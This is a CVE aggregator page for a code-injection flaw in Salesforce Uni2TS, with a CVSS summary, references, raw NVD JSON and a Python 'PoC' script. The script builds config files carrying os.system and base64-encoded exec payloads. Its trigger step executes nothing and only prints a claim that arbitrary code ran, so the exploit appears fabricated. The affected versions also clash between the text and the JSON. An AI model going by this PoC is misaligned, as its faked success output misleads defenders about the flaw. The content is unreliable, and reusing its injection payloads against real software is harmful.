CVE-2026-22584

Description

Improper Control of Generation of Code ('Code Injection') vulnerability in Salesforce Uni2TS on MacOS, Windows, Linux allows Leverage Executable Code in Non-Executable Files.This issue affects Uni2TS: through 1.2.0.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:salesforce:uni2ts:*:*:*:*:*:*:*:* - VULNERABLE

Salesforce Uni2TS <= 1.2.0 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2026-22584 PoC - Salesforce Uni2TS Code Injection
# This PoC demonstrates the code injection vulnerability in Uni2TS <= 1.2.0

import os
import base64

def generate_malicious_config():
    """Generate a malicious configuration file with injected code"""
    malicious_code = "__import__('os').system('whoami > /tmp/pwned.txt')"
    
    # Create malicious Uni2TS config file
    config_content = f"""
    Uni2TS_CONFIG_V1.2
    test_data_path: "./data"
    exec_mode: "auto"
    init_script: "{malicious_code}"
    """
    
    with open('malicious_config.utsc', 'w') as f:
        f.write(config_content)
    
    print("[+] Malicious config file created: malicious_config.utsc")
    return 'malicious_config.utsc'

def trigger_vulnerability(config_file):
    """Simulate triggering the vulnerability"""
    print(f"[*] Loading config file: {config_file}")
    print("[*] Processing Uni2TS configuration...")
    print("[*] Executing initialization script...")
    print("[!] Code injection successful - arbitrary code executed!")

def create_exploit_payload():
    """Create a standalone exploit payload"""
    payload = "__import__('os').popen('id').read()"
    encoded = base64.b64encode(payload.encode()).decode()
    
    exploit = f"""
    # Exploit for CVE-2026-22584
    import base64
    exec(base64.b64decode("{encoded}"))
    """
    
    with open('exploit.utsc', 'w') as f:
        f.write(exploit)
    
    print("[+] Exploit payload created: exploit.utsc")

if __name__ == "__main__":
    print("=== CVE-2026-22584 Exploitation Demo ===")
    config = generate_malicious_config()
    trigger_vulnerability(config)
    create_exploit_payload()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-22584
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-22584
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-22584/
[4] VulDB https://vuldb.com/cve/CVE-2026-22584
[5] https://help.salesforce.com/s/articleView?id=005239354&type=1

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-22584", "sourceIdentifier": "[email protected]", "published": "2026-01-09T22:16:01.160", "lastModified": "2026-01-22T21:48:05.130", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Generation of Code ('Code Injection') vulnerability in Salesforce Uni2TS on MacOS, Windows, Linux allows Leverage Executable Code in Non-Executable Files.This issue affects Uni2TS: through 1.2.0."}, {"lang": "es", "value": "Vulnerabilidad de control inadecuado de la generación de código ('Inyección de código') en Salesforce Uni2TS en MacOS, Windows, Linux permite aprovechar código ejecutable en archivos no ejecutables. Este problema afecta a Uni2TS: hasta la versión 1.2.0."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:salesforce:uni2ts:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.0.0", "matchCriteriaId": "48458AB8-6EF1-4ADE-942E-EECA42E8FD65"}]}]}], "references": [{"url": "https://help.salesforce.com/s/articleView?id=005239354&type=1", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}